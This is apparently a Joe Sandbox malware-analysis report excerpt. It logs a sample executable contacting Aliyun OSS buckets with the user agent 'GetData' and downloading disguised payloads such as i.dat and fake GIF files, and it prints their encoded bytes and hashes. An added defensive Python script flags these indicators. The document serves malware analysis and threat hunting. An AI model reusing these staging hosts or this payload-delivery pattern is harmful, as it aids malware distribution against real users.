Jan 6, 2025 04:42:01.753597021 CET | 1.1.1.1 | 192.168.2.9 | 0x526 | No error (0) | s-part-0017.t-0009.t-msedge.net | | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 04:43:26.698380947 CET | 1.1.1.1 | 192.168.2.9 | 0x47aa | No error (0) | hu5wd1.oss-cn-beijing.aliyuncs.com | sc-231t.cn-beijing.oss-adns.aliyuncs.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 6, 2025 04:43:26.698380947 CET | 1.1.1.1 | 192.168.2.9 | 0x47aa | No error (0) | sc-231t.cn-beijing.oss-adns.aliyuncs.com | sc-231t.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 6, 2025 04:43:26.698380947 CET | 1.1.1.1 | 192.168.2.9 | 0x47aa | No error (0) | sc-231t.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com | | 39.103.20.26 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 04:43:59.021681070 CET | 1.1.1.1 | 192.168.2.9 | 0x266b | No error (0) | 22mm.oss-cn-hangzhou.aliyuncs.com | sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 6, 2025 04:43:59.021681070 CET | 1.1.1.1 | 192.168.2.9 | 0x266b | No error (0) | sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com | sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 6, 2025 04:43:59.021681070 CET | 1.1.1.1 | 192.168.2.9 | 0x266b | No error (0) | sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com | | 118.178.60.9 | A (IP address) | IN (0x0001) | false
• hu5wd1.oss-cn-beijing.aliyuncs.com
• 22mm.oss-cn-hangzhou.aliyuncs.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49974 | 39.103.20.26 | 443 | 7580 | C:\Users\user\Desktop\2749837485743-7684385786.05.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 03:43:27 UTC | 111 | OUT |
GET /i.dat HTTP/1.1
User-Agent: GetData
Host: hu5wd1.oss-cn-beijing.aliyuncs.com
Cache-Control: no-cache
2025-01-06 03:43:28 UTC | 558 | IN |
HTTP/1.1 200 OK
Server: AliyunOSS
Date: Mon, 06 Jan 2025 03:43:28 GMT
Content-Type: application/octet-stream
Content-Length: 512
Connection: close
x-oss-request-id: 677B5160A645AE3739483F13
Accept-Ranges: bytes
ETag: "3F830864D62708390D84A4629D88083D"
Last-Modified: Sun, 05 Jan 2025 09:01:14 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 17523956267580149674
x-oss-storage-class: Standard
x-oss-ec: 0048-00000113
Content-Disposition: attachment
x-oss-force-download: true
Content-MD5: P4MIZNYnCDkNhKRinYgIPQ==
x-oss-server-time: 3
2025-01-06 03:43:28 UTC | 512 | IN |
Data Raw: 07 1b 1b 1f 6c 25 30 30 58 45 05 47 23 76 69 28 5b 5b 05 4b 25 66 29 2e 47 44 47 40 27 6e 21 2c 45 55 59 42 21 31 6c 21 4e 4c 0e 40 6e 27 29 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 4e 52 52 56 25 6c 79 79 11 0c 4c 0e 6a 3f 20 61 12 12 4c 02 6c 2f 60 67 0e 0d 0e 09 6e 27 68 65 0c 1c 10 0b 68 78 25 68 07 05 47 0a 24 6d 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 04 18 18 1c 6f 26 33 33 5b 46 06 44 20 75 6a 2b 58 58 06 48 26 65 2a 2d 44 47 44 43 24 6d 22 2f 46 56 5a 41 22 32 6f 22 4d 4f 0d 41 6f 26 28 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 4f 53 53 57 24 6d 78 78 10 0d 4d 0f 6b 3e 21
Data Ascii: l%00XEG#vi([[K%f).GDG@'n!,EUYB!1l!NL@n')&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&NRRV%lyyLj? aLl/`gn'hehx%hG$mclllllllllllllllllllllllllllllllllo&33[FD uj+XXH&e*-DGDC$m"/FVZA"2o"MOAo&('''''''''''''''''''''''''''''''''OSSW$mxxMk>!
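Two details in the OSS responses recorded here are worth checking mechanically rather than by eye. First, the `/a.gif` object in the next session is served as `Content-Type: image/gif`, but its body begins with the PNG signature `89 50 4E 47 0D 0A 1A 0A`, so the declared type and the actual content disagree. Second, AliyunOSS returns the object's MD5 twice, as quoted uppercase hex in `ETag` and as base64 in `Content-MD5`; when the two agree they give a hash of the staged payload that can be hunted for even though the sandbox shows only the first bytes of each body. The script below is an added example and is not part of the Joe Sandbox report, the sample, or AliyunOSS; the request and response heads are copied from the two sessions in this report, and the bodies are constructed from only the leading bytes of the `Data Raw` lines, which is all a magic-byte check needs. It flags the non-browser `User-Agent: GetData`, the GIF/PNG mismatch, and reports the cross-checked MD5 of each object.

```python
import base64
import binascii

# Body signatures compared against the declared Content-Type.
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
    b"MZ": "application/vnd.microsoft.portable-executable",
}

# Constructed sample input: request/response heads copied from the report's
# two sessions; bodies are only the leading bytes shown in the Data Raw lines.
I_DAT_REQ = (b"GET /i.dat HTTP/1.1\r\nUser-Agent: GetData\r\n"
             b"Host: hu5wd1.oss-cn-beijing.aliyuncs.com\r\nCache-Control: no-cache\r\n\r\n")
I_DAT_RESP = (b"HTTP/1.1 200 OK\r\nServer: AliyunOSS\r\n"
              b"Content-Type: application/octet-stream\r\nContent-Length: 512\r\n"
              b'ETag: "3F830864D62708390D84A4629D88083D"\r\n'
              b"Content-Disposition: attachment\r\n"
              b"Content-MD5: P4MIZNYnCDkNhKRinYgIPQ==\r\n\r\n")
I_DAT_BODY = bytes.fromhex("071b1b1f6c25303058450547237669285b5b054b")
A_GIF_REQ = (b"GET /a.gif HTTP/1.1\r\nUser-Agent: GetData\r\n"
             b"Host: hu5wd1.oss-cn-beijing.aliyuncs.com\r\nCache-Control: no-cache\r\n\r\n")
A_GIF_RESP = (b"HTTP/1.1 200 OK\r\nServer: AliyunOSS\r\n"
              b"Content-Type: image/gif\r\nContent-Length: 135589\r\n"
              b'ETag: "0DDD3F02B74B01D739C45956D8FD12B7"\r\n'
              b"Content-Disposition: attachment\r\n"
              b"Content-MD5: Dd0/ArdLAdc5xFlW2P0Stw==\r\n\r\n")
A_GIF_BODY = bytes.fromhex("89504e470d0a1a0a0000000d49484452")


def parse_head(raw):
    """Split an HTTP/1.1 message head into (start line, {lowercased name: value})."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def oss_object_md5(headers):
    """Return the object's MD5 as uppercase hex when Content-MD5 (base64) and
    ETag (quoted hex) agree, else None. Caveat: AliyunOSS sets ETag to the plain
    MD5 only for single-part uploads, so None is not by itself evidence of tampering."""
    b64 = headers.get("content-md5")
    etag = headers.get("etag", "").strip('"')
    if not b64 or not etag:
        return None
    try:
        digest = base64.b64decode(b64, validate=True)
    except (ValueError, binascii.Error):
        return None
    if len(digest) != 16 or digest.hex().lower() != etag.lower():
        return None
    return digest.hex().upper()


def sniff_type(body):
    """Identify the body by its leading bytes; None when no known signature matches."""
    for magic, mime in MAGIC.items():
        if body.startswith(magic):
            return mime
    return None


def audit_session(request, response, body):
    """Return [(finding, detail)] for one request/response pair."""
    _, req_h = parse_head(request)
    _, resp_h = parse_head(response)
    findings = []
    ua = req_h.get("user-agent", "")
    if not ua.startswith("Mozilla/"):          # crude: browsers all send Mozilla/5.0
        findings.append(("non-browser-user-agent", ua))
    declared = resp_h.get("content-type", "").split(";")[0].strip().lower()
    actual = sniff_type(body)
    if actual and actual != declared:
        findings.append(("content-type-mismatch", f"declared {declared}, body is {actual}"))
    md5 = oss_object_md5(resp_h)
    if md5:
        findings.append(("payload-md5", md5))
    return findings


if __name__ == "__main__":
    for name, req, resp, body in (("i.dat", I_DAT_REQ, I_DAT_RESP, I_DAT_BODY),
                                  ("a.gif", A_GIF_REQ, A_GIF_RESP, A_GIF_BODY)):
        for finding, detail in audit_session(req, resp, body):
            print(f"{name}: {finding}: {detail}")
```

The `User-Agent` heuristic is deliberately blunt; in a real pipeline it would be a lookup against the user agents the monitored hosts are known to emit. The `Content-MD5`/`ETag` cross-check only confirms that the server's two statements of the hash agree, so the resulting value is an indicator for hunting, not a guarantee of what was stored in the bucket.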


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49975 | 39.103.20.26 | 443 | 7580 | C:\Users\user\Desktop\2749837485743-7684385786.05.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 03:43:29 UTC | 111 | OUT |
GET /a.gif HTTP/1.1
User-Agent: GetData
Host: hu5wd1.oss-cn-beijing.aliyuncs.com
Cache-Control: no-cache
2025-01-06 03:43:29 UTC | 545 | IN |
HTTP/1.1 200 OK
Server: AliyunOSS
Date: Mon, 06 Jan 2025 03:43:29 GMT
Content-Type: image/gif
Content-Length: 135589
Connection: close
x-oss-request-id: 677B5161F326DB3534E07E61
Accept-Ranges: bytes
ETag: "0DDD3F02B74B01D739C45956D8FD12B7"
Last-Modified: Sun, 05 Jan 2025 09:00:15 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 8642451798640735006
x-oss-storage-class: Standard
x-oss-ec: 0048-00000104
Content-Disposition: attachment
x-oss-force-download: true
Content-MD5: Dd0/ArdLAdc5xFlW2P0Stw==
x-oss-server-time: 9
2025-01-06 03:43:29 UTC | 3551 | IN |
Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-06 03:43:29 UTC | 4096 | IN |
Data Raw: 94 95 15 58 67 66 8f 0d ac 9c 9e d7 25 61 ea 28 7c d1 e2 ef 25 bc 8d ce ad ad e6 24 78 4e a7 6d 84 b4 b6 ff 3d 79 ce ae f0 30 fa 9b e0 89 4f 97 e0 f5 8e 4a c5 b1 9a ca cc 32 1e 44 28 99 59 18 2b c0 75 e7 d9 d9 59 24 df a8 d2 97 6d ad c6 d3 0c 89 da e7 e8 02 e8 d8 2c a5 6b 2f b8 7a 4e d7 b4 f7 f6 f7 b0 72 66 df ac ff fe ff 48 88 07 bd b1 04 06 08 8c db 0a 0b 0c 45 83 1a 91 41 13 13 5c 9e de e8 0d 61 2a 1a 1c 55 95 12 81 94 23 23 6c a8 33 5d 78 28 2a 63 a5 28 4d 9a 31 31 cd 26 69 05 37 37 70 b2 37 bd 89 3c 3e 77 cd 54 35 13 45 45 0e ce 4d 39 ff 4a 4c b2 5b 0d 60 50 52 1b df 58 3d e2 59 59 12 d6 49 39 0e 5e 60 29 eb 66 89 d1 67 67 97 7c 4d 5b 6d 6d 26 e4 7d 21 c7 72 74 3d fb 62 21 29 7b 7b 34 f4 7b 65 35 80 82 7c 91 89 b6 86 88 c1 01 86 b9 38 8f 8f d8 1c 87
Data Ascii: Xgf%a(|%$xNm=y0OJ2D(Y+uY$m,k/zNrfHEA\a*U##l3]x(*c(M11&i77p7<>wT5EEM9JL[`PRX=YYI9^`)fgg|M[mm&}!rt=b!){{4{e5|8
2025-01-06 03:43:29 UTC | 4096 | IN |
Data Raw: 81 49 b6 96 98 1c 6c ee db d5 13 d3 84 f1 5d b6 e1 84 a7 a7 2b 69 ab e7 cf 4d e3 ac 54 4e a7 ed 94 b4 b6 fa 33 7d f2 30 74 8e 6c 40 d5 d9 e2 c2 c4 8d 43 07 80 42 22 bf df 85 43 9b f4 81 9f 58 10 9d 5d 1f 30 41 ec db dc 91 55 32 ac 68 89 d3 6f e0 e9 41 e9 e9 a2 66 e1 81 4b ee f0 ca 0c 7a b7 c9 f9 b8 06 06 ef 75 dc fc fe b7 8b 0c 95 97 05 05 4a 8c a4 2d 7a 03 0c 0d 42 84 b4 35 6a 1b 14 15 5e 94 e1 e6 52 90 b0 39 86 17 20 21 57 69 6c ae 23 a5 8d 28 2a 67 a7 20 5d 8a 31 31 7e b8 31 61 93 36 38 b2 2f 4d 99 3c 3e 86 41 41 42 43 08 cc 32 63 60 01 c3 0f 68 6d b1 5a 51 f4 53 53 1c de 5b 15 cc 58 5a de 9c d6 ae 16 6f 29 ad e6 a4 2d ef 6a 59 fd 6b 6b 14 73 22 e2 3c 55 4e 36 47 b5 cc f9 6b 79 7a 33 bb 39 5a 5f 84 81 82 83 7b 90 cd 22 89 89 01 7b c4 00 83 45 34 90 92
Data Ascii: Il]+iMTN3}0tl@CB"CX]0AU2hoAfKzuJ-zB5j^R9 !Wil#(*g ]11~1a68/M<>AABC2c`hmZQSS[XZo)-jYkks"<UN6Gkyz39Z_{"{E4
2025-01-06 03:43:30 UTC | 4096 | IN |
Data Raw: 9b 94 96 df 13 d5 be cb 63 88 7d 90 a1 a1 ea 2e a9 c1 30 a6 a8 56 bf 6d bc ac ae 2a 4f c9 af 32 4f 3f a5 b7 b8 cd af 3a 47 36 ad bf c0 b5 cf 8b 4f 10 7f c7 cc c9 ca 23 79 3b 31 30 5b 16 9a 58 68 f1 76 d7 d8 d9 92 58 18 bd 9f 82 a1 bd bc be bf 26 2a 2b 24 25 26 27 20 21 22 23 3c 3d 3e 3f 38 bd 7f ab dc e9 b2 72 90 d9 e6 a8 48 82 ee 33 8f c4 4f 8c d0 41 81 f1 8f e5 0a 84 f9 1e 96 c1 14 15 16 94 e0 18 15 9f b1 1d 1e 1f 68 ac 2f 15 b1 24 26 6f a1 5d 0e 6b d3 38 75 3f 31 31 7a b8 39 51 b2 36 38 71 b9 c2 c3 48 6b 73 cb 4c 1d d6 45 45 0a cc 4d 09 df 4a 4c c6 5b 2d c5 50 52 1b d9 50 15 d3 59 59 e3 5a 5c 5d 5e 17 e9 25 46 4b 2c ee 63 25 fd 68 6a 23 e5 29 4a 4f 8f 64 ad e7 75 75 3e fc 75 59 fe 7a 7c f6 8e 37 03 49 7d 06 72 cd 89 cf 40 0c 7c c3 05 80 85 0b 91 91 ea
                                                    2025-01-06 03:43:30 UTC4096INData Raw: 9b 94 96 df 13 d5 be cb 63 88 7d 90 a1 a1 ea 2e a9 c1 30 a6 a8 56 bf 6d bc ac ae 2a 4f c9 af 32 4f 3f a5 b7 b8 cd af 3a 47 36 ad bf c0 b5 cf 8b 4f 10 7f c7 cc c9 ca 23 79 3b 31 30 5b 16 9a 58 68 f1 76 d7 d8 d9 92 58 18 bd 9f 82 a1 bd bc be bf 26 2a 2b 24 25 26 27 20 21 22 23 3c 3d 3e 3f 38 bd 7f ab dc e9 b2 72 90 d9 e6 a8 48 82 ee 33 8f c4 4f 8c d0 41 81 f1 8f e5 0a 84 f9 1e 96 c1 14 15 16 94 e0 18 15 9f b1 1d 1e 1f 68 ac 2f 15 b1 24 26 6f a1 5d 0e 6b d3 38 75 3f 31 31 7a b8 39 51 b2 36 38 71 b9 c2 c3 48 6b 73 cb 4c 1d d6 45 45 0a cc 4d 09 df 4a 4c c6 5b 2d c5 50 52 1b d9 50 15 d3 59 59 e3 5a 5c 5d 5e 17 e9 25 46 4b 2c ee 63 25 fd 68 6a 23 e5 29 4a 4f 8f 64 ad e7 75 75 3e fc 75 59 fe 7a 7c f6 8e 37 03 49 7d 06 72 cd 89 cf 40 0c 7c c3 05 80 85 0b 91 91 ea
                                                    Data Ascii: c}.0Vm*O2O?:G6O#y;10[XhvX&*+$%&' !"#<=>?8rH3OAh/$&o]k8u?11z9Q68qHksLEEMJL[-PRPYYZ\]^%FK,c%hj#)JOduu>uYz|7I}r@|
                                                    2025-01-06 03:43:30 UTC4096INData Raw: ac d4 2f 87 98 99 9a d3 17 d5 96 ac 72 e9 2b ff 80 8d ee 2e e4 8d 96 e3 27 e1 8a 9f 77 f5 96 8b b5 b5 b6 b7 7f fd 9e ff be bd be bf 88 48 9e e7 e4 3a d3 4d 37 c9 ca 4e 0c b8 c8 30 c5 d1 d2 d2 d4 9d 5d 9b fc e9 25 ce c1 dd df df 27 e4 4d 65 e5 e5 e7 e7 e8 e9 d9 22 04 89 21 10 0f b9 7f fe 91 70 f7 f7 07 ec 75 fb fd fd b6 7c 3d 96 76 02 04 fa 4a 8a 05 31 fb f4 f3 41 87 02 81 94 13 13 d3 10 81 92 19 19 19 3b 1c 1d 56 96 3d 49 a7 22 24 6d af 3a a9 ac 2b 2b 59 16 6b 1c f0 79 bf 36 51 41 37 37 82 3a 1a 3b 3c 75 b7 7b 64 69 03 ce 0c 44 0e ce 14 6d 6a b4 59 49 cb 4e 50 19 d9 46 11 21 57 57 11 da 92 a4 d9 9d 17 50 28 b1 2a ea 71 51 12 66 68 21 e7 66 81 e9 6f 6f 8f 64 8d 8c 74 75 9e bd 90 86 85 33 f1 31 5a 2f b3 53 c3 3b 98 84 86 87 60 a1 ee 8b 8c c5 03 c3 b4 c1 55
                                                    Data Ascii: /r+.'wH:M7N0]%'Me"!pu|=vJ1A;V=I"$m:++Yky6QA77:;<u{diDmjYINPF!WWP(*qQfh!foodtu31Z/S;`U
                                                    2025-01-06 03:43:30 UTC4096INData Raw: d4 16 36 5f 98 99 9a 66 24 62 61 60 df e9 29 d7 80 cd ee 24 6c f9 f5 68 e4 28 58 db 05 f9 39 f7 90 85 fe 3e e4 9d da 38 c4 a9 be ca 84 a7 a4 a5 54 ca 71 d8 ae 4a 31 8a be c7 a8 4c 2b 8b a5 d7 b2 56 15 f7 d7 6e dc bd e1 9c de ad ea 87 df b9 e4 92 e2 81 ed c9 ea a3 6f 2a ec a7 73 37 f0 95 71 2e 82 b6 9e c2 22 8f 34 16 c4 99 66 91 64 65 94 0a b1 08 40 84 5e 2f 3c e5 dd 26 10 11 1d a4 1a 5d 9b 43 3c 29 7c 90 c4 55 9d d8 22 c9 9d 0a 24 25 6e a4 ee 2b 4c ae f7 59 2b 49 0b e9 46 e2 78 be 6a 13 78 36 8d f3 33 8a fd 77 cb 1d 66 23 6f 84 c6 3b 6c 01 4a 3f 44 0c cd ec 98 51 52 53 a9 1d dd 23 7c 31 12 d8 98 0d 01 9c ac ad ae af a8 2d e5 8b 50 ea 57 ae 06 6c 6e 6f 3c fa bb 7c f1 f7 76 77 78 31 ff b2 09 50 96 5d ad 81 82 c6 b7 4c c3 b4 48 ba 58 b8 45 c5 49 cb b4 b1 92
                                                    Data Ascii: 6_f$ba`)$lh(X9>8TqJ1L+Vno*s7q."4fde@^/<&]C<)|U"$%n+LY+IFxjx63wf#o;lJ?DQRS#|1-PWlno<|vwx1P]LHXEI
                                                    2025-01-06 03:43:30 UTC4096INData Raw: d5 c9 c9 c9 c5 5a 56 57 50 51 52 53 6c 6d 6e 6f 68 e5 f5 ef 2b 45 9a e3 29 64 e6 24 69 be 36 d4 b5 b5 b6 ff 3d 6b b5 3f e2 bc be bf 85 f2 10 8e 41 05 8a 4c 11 bd e2 8a c3 7a ce a9 55 11 a6 cc 95 6f d4 d7 d8 d9 93 e0 0e d2 58 25 e0 e1 e2 af 69 bc e4 81 61 e8 8c aa 2b ee d4 ef bd f2 28 be 71 3c 82 ad 9e b8 79 c2 fc 89 ad 99 66 91 64 65 94 4c 85 c5 09 45 31 d9 03 8e c5 0f 10 11 53 1c a3 14 5f 94 d9 1b 53 98 df 1f 78 5e a9 62 dc 45 65 a6 1f 27 5d f2 6b 24 9b 6c d0 49 0d 1e 32 47 29 53 0b 6b 38 4d 2d 72 bf ff 3f 73 7b 93 4d c0 d1 45 46 47 2e 08 8d 48 10 4d 07 cc 93 53 1a d8 18 71 36 1f dd 90 2e 73 3a de 67 5f 14 43 04 05 f4 2c e5 a5 69 25 51 b9 1f 02 61 d8 71 39 f1 b2 76 3c f5 b4 7a 1f 3b f2 3f 83 18 fc b9 81 f7 62 cc 0e ca a3 e0 c1 0f 42 f8 cb 81 38 91 f7 17
                                                    Data Ascii: ZVWPQRSlmnoh+E)d$i6=k?ALzUoX%ia+(q<yfdeLE1S_Sx^bEe']k$lI2G)Sk8M-r?s{MEFG.HMSq6.s:g_C,i%Qaq9v<z;?bB8
                                                    2025-01-06 03:43:30 UTC4096INData Raw: 17 55 b6 de 1b 71 9b ee 4c d5 15 1d f8 a0 a2 a3 54 26 26 c7 a9 a9 aa aa 6f 61 62 63 7c 7d 7e 7f 78 fd 33 7e b7 3d 2c bb bc bd 4e 3c c1 3e 8a 48 45 d5 c7 c7 c8 81 4f 0b b8 c9 3e 4c d0 2e 9a 58 55 f5 d7 d7 d8 91 5f 1b a8 d9 2e 5c e0 1e aa 68 65 fd e7 e7 e8 a1 6f 2b 98 e9 1e 6c f0 0e ba 78 75 c5 f7 f7 f8 b1 7f 3b 88 f9 0e 7c 00 fe 4a 8e 45 5d 47 bf 0e 09 0a 0b 40 80 03 fd 24 10 12 75 84 59 2f 5f e8 6d 16 53 97 0d 56 9a f2 55 26 d3 a7 27 d9 6f ab 51 d2 2b 58 20 66 a4 60 39 7a b6 e6 41 32 c7 bb 3b c5 73 bf fd 1e 76 c3 a9 43 36 94 0d cd c6 10 48 4a 4b bc ce ce 2f 51 51 52 ac 1c de 97 94 94 95 96 97 90 91 92 93 ac ad ae af a8 25 35 2f eb 85 4a 23 e9 bf 26 e4 aa 05 37 3b f1 bc 02 37 34 f2 6b 37 47 af 0a 50 c8 08 93 cb 0f 4f 6e 0d 76 76 75 c6 09 5f fa 90 d9 1a 58
                                                    Data Ascii: UqLT&&oabc|}~x3~=,N<>HEO>L.XU_.\heo+lxu;|JE]G@$uY/_mSVU&'oQ+X f`9zA2;svC6HJK/QQR%5/J#&7;74k7GPOnvvu_X
                                                    2025-01-06 03:43:30 UTC4096INData Raw: 1f 5a 7e 3d d3 99 9a d3 17 d6 8e 14 50 ae 14 e7 80 95 2e a6 41 2a aa ab ac e5 25 db 94 f1 31 7a 94 36 7e 48 31 f2 a2 f3 37 e1 9a f7 88 42 06 e3 9b 06 45 38 37 bd e9 48 33 33 ba d1 98 5a 15 9b 5f 1a 9e 5a cd d1 82 da dc 5e 3e c0 a8 20 1b e6 ac 8e 26 bf a0 ea ee 21 07 ea a6 62 f5 71 d8 f2 f4 03 b6 ff d8 8d e9 c8 2e 76 31 bb 8d 43 00 eb d9 44 06 07 40 8a f2 f4 78 2b 46 84 5b 01 98 57 30 25 9e 16 f3 0f a7 1a 1c 1d 1e 57 ad 75 06 13 af ea 62 ac ed c1 3d 60 2c 2d a5 df 0b c4 46 3a b7 7e 2e 17 bb f1 c5 d0 39 32 88 7b 64 71 0a c8 28 61 7e 0f c3 3d 6e 0b 04 c6 12 6b 18 19 d1 97 74 0a 95 9b 94 95 96 97 90 91 92 93 ac ad ae af a8 2d ef 3b 4c 79 3c 23 ef 81 0e 22 f5 b8 3f f8 a5 3c fd 87 30 f2 a0 37 f7 a4 0b 50 68 a1 7f 7c 7b c0 b5 4e cd ba 4a 4c 8c 9b 8e 8f 90 a2 52
                                                    Data Ascii: Z~=P.A*%1z6~H17BE87H33Z_Z^> &!bq.v1CD@x+F[W0%Wub=`,-F:~.92{dq(a~=nkt-;Ly<#"?<07Ph|{NJLR
                                                    2025-01-06 03:43:30 UTC4096INData Raw: 57 94 e2 9f d0 12 55 73 09 58 61 60 e8 2a 65 eb 2f f9 82 97 e0 2a 6e 8b f3 6e 62 63 7c 7d 7e 7f 78 f9 3b f6 a9 f1 39 79 ad f1 95 7d a6 51 a4 a5 54 ca 70 cd 8a c6 7c cf ce e6 06 ba d8 99 51 11 d5 50 16 a2 34 5c 13 d4 48 1d 1d 13 2c 2d 2e 2f 28 ad 6f ea 01 c2 eb eb 2f 21 22 23 3c 3d 3e 3f 38 b5 a5 bf 7b 15 da b3 77 24 b6 74 0d d1 29 02 04 ed 1d e4 f7 f6 42 8e cc 79 1a 47 9b da ed c3 91 d5 62 1c a0 18 1a 1b 1c 55 9d db 00 7a e1 10 e4 6d a5 e3 08 72 e9 e7 e0 e1 e2 e3 fc fd fe ff f8 75 65 7f bb d5 1a 73 bf c4 de 77 cb 98 4d c4 df 45 46 47 00 c0 3e 6f 7c 05 cb 86 ee 50 52 53 54 1d 59 12 a9 11 d3 27 78 65 38 39 f0 07 04 05 f4 2d ed 6a d9 59 6b 6b 24 e8 a7 1a 50 99 7d 77 74 75 cf 69 78 79 7a 93 b9 7c 7e 7f 39 7e 82 83 84 6d 4d 74 77 76 c2 00 81 01 be 8e 90 dd 19
                                                    Data Ascii: WUsXa`*e/*nnbc|}~x;9y}QTp|QP4\H,-./(o/!"#<=>?8{w$t)ByGbUzmrueswMEFG>o|PRSTY'xe89-jYkk$P}wtuixyz|~9~mMtwv


                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                    2           192.168.2.9  49976        39.103.20.26    443               7580  C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                    Timestamp                Bytes transferred  Direction  Data
                                                    2025-01-06 03:43:31 UTC  111                OUT        GET /b.gif HTTP/1.1
                                                                                                           User-Agent: GetData
                                                                                                           Host: hu5wd1.oss-cn-beijing.aliyuncs.com
                                                                                                           Cache-Control: no-cache
                                                    2025-01-06 03:43:32 UTC  547                IN         HTTP/1.1 200 OK
                                                                                                           Server: AliyunOSS
                                                                                                           Date: Mon, 06 Jan 2025 03:43:32 GMT
                                                                                                           Content-Type: image/gif
                                                                                                           Content-Length: 125333
                                                                                                           Connection: close
                                                                                                           x-oss-request-id: 677B5163AF1C2D393240C55A
                                                                                                           Accept-Ranges: bytes
                                                                                                           ETag: "2CA9F4AB0970AA58989D66D9458F8701"
                                                                                                           Last-Modified: Sun, 05 Jan 2025 09:00:15 GMT
                                                                                                           x-oss-object-type: Normal
                                                                                                           x-oss-hash-crc64ecma: 10333201072197591521
                                                                                                           x-oss-storage-class: Standard
                                                                                                           x-oss-ec: 0048-00000104
                                                                                                           Content-Disposition: attachment
                                                                                                           x-oss-force-download: true
                                                                                                           Content-MD5: LKn0qwlwqliYnWbZRY+HAQ==
                                                                                                           x-oss-server-time: 27


                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                    3           192.168.2.9  49977        39.103.20.26    443               7580  C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                    Timestamp                Bytes transferred  Direction  Data
                                                    2025-01-06 03:43:33 UTC  111                OUT        GET /c.gif HTTP/1.1
                                                                                                           User-Agent: GetData
                                                                                                           Host: hu5wd1.oss-cn-beijing.aliyuncs.com
                                                                                                           Cache-Control: no-cache
                                                    2025-01-06 03:43:33 UTC  546                IN         HTTP/1.1 200 OK
                                                                                                           Server: AliyunOSS
                                                                                                           Date: Mon, 06 Jan 2025 03:43:33 GMT
                                                                                                           Content-Type: image/gif
                                                                                                           Content-Length: 10681
                                                                                                           Connection: close
                                                                                                           x-oss-request-id: 677B516572AE9E34334B9362
                                                                                                           Accept-Ranges: bytes
                                                                                                           ETag: "10A818386411EE834D99AE6B7B68BE71"
                                                                                                           Last-Modified: Sun, 05 Jan 2025 09:00:14 GMT
                                                                                                           x-oss-object-type: Normal
                                                                                                           x-oss-hash-crc64ecma: 10287299869673359293
                                                                                                           x-oss-storage-class: Standard
                                                                                                           x-oss-ec: 0048-00000104
                                                                                                           Content-Disposition: attachment
                                                                                                           x-oss-force-download: true
                                                                                                           Content-MD5: EKgYOGQR7oNNma5re2i+cQ==
                                                                                                           x-oss-server-time: 25


                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                    4           192.168.2.9  49978        39.103.20.26    443               7580  C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                    Timestamp                Bytes transferred  Direction  Data
                                                    2025-01-06 03:43:35 UTC  111                OUT        GET /d.gif HTTP/1.1
                                                                                                           User-Agent: GetData
                                                                                                           Host: hu5wd1.oss-cn-beijing.aliyuncs.com
                                                                                                           Cache-Control: no-cache
                                                    2025-01-06 03:43:35 UTC  547                IN         HTTP/1.1 200 OK
